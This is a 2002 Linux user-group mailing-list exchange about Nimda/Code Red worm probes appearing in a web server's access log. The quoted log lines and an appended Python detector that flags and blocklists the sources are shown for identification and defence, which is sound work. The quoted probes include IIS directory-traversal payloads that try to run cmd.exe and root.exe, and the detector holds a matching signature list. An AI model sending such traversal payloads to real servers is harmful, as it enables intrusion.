[olug] Is this a virus?

einer andrew at einer.org
Tue May 21 18:41:04 UTC 2002


nimda or Code Red.  

Not much you can do to keep these servers from attacking you except 
maybe blocking their ip.

Well, not much 'legally' you can do.  These machines are actually 
already exploited and wide open.  There was a code green worm that used 
the same vulnerabilities and fixed these holes.  Not sure if one ever 
came out that took care of nimda.  Either way, the ethics involved in 
creating a retro virus are questionable, simply because of the 
possibility of severe and truly ugly breakage.

Black hole em as they come.

Andrew

Jonathan Warren wrote:

>I am getting these in my access.log.  Any suggestions on how to shut up the offending servers?
>
>68.13.41.165 - - [10/May/2002:14:20:40 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 287
>68.13.41.165 - - [10/May/2002:14:20:43 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 285
>68.13.41.165 - - [10/May/2002:14:20:45 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295
>68.13.41.165 - - [10/May/2002:14:20:47 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295
>68.13.41.165 - - [10/May/2002:14:20:49 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
>68.13.41.165 - - [10/May/2002:14:20:51 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 326
>68.13.41.165 - - [10/May/2002:14:20:53 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 326
>68.13.41.165 - - [10/May/2002:14:20:55 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 342
>68.13.41.165 - - [10/May/2002:14:20:57 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308
>68.13.41.165 - - [10/May/2002:14:20:59 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308
>68.13.41.165 - - [10/May/2002:14:21:00 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308
>68.13.41.165 - - [10/May/2002:14:21:01 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308
>68.13.41.165 - - [10/May/2002:14:21:02 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 292
>68.13.41.165 - - [10/May/2002:14:21:03 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 292
>68.13.41.165 - - [10/May/2002:14:21:04 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
>68.13.41.165 - - [10/May/2002:14:21:05 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
>167.132.64.131 - - [14/May/2002:07:03:55 -0500] "GET /~thechunk HTTP/1.1" 301 333
>
>
>-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_
>
>For help contact olug-help at olug.org - run by ezmlm
>to unsubscribe, send mail to olug-unsubscribe at olug.org
>or `mail olug-unsubscribe at olug.org < /dev/null`
>(c)1998-2002 OLUG http://www.olug.org
>
>-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_
>  
>
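Detection logic for the kind of probes quoted in Jonathan's access.log, as an added example that is not part of this thread: it parses common-log-format lines, flags the root.exe/cmd.exe requests and the double-encoded or overlong-UTF-8 traversal forms the worm tries, tallies them per source address, and lists the sources worth black-holing. The sample log lines are constructed with documentation-range addresses; the signature list and the probe threshold are assumptions, not anything from the original post.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample lines in Apache common log format, shaped like the
# excerpt in the thread; the addresses are documentation-range placeholders.
SAMPLE_LOG = """\
192.0.2.10 - - [10/May/2002:14:20:40 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 287
192.0.2.10 - - [10/May/2002:14:20:49 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
192.0.2.10 - - [10/May/2002:14:21:00 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308
192.0.2.10 - - [10/May/2002:14:21:02 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 292
198.51.100.7 - - [14/May/2002:07:03:55 -0500] "GET /~thechunk HTTP/1.1" 301 333
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+')

# Encodings the worm uses to slip "..\" past IIS path checks: double-encoded
# and overlong-UTF-8 forms of backslash and slash (assumed signature list).
RAW_SIG = re.compile(r'%255c|%252f|%c0%af|%c0%2f|%c1%1c|%c1%9c|%%35', re.I)

def is_worm_probe(path):
    """True if the request path looks like a Code Red / Nimda probe."""
    if RAW_SIG.search(path):
        return True
    decoded = path
    for _ in range(3):              # collapse %25-style double encoding
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    low = decoded.lower()
    return ('cmd.exe' in low or 'root.exe' in low
            or '../' in low or '..\\' in low)

def scan(log_text):
    """Count worm-style probes per source IP over a block of log lines."""
    hits = Counter()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and is_worm_probe(m.group('path')):
            hits[m.group('ip')] += 1
    return hits

def blocklist(hits, threshold=3):
    """Sources whose probe count reaches the threshold: candidates to black-hole."""
    return sorted(ip for ip, n in hits.items() if n >= threshold)
```

Feed `scan()` the real access.log instead of `SAMPLE_LOG` and the returned counter is what you would hand to a firewall drop rule; the threshold keeps a single stray 404 from landing someone on the list.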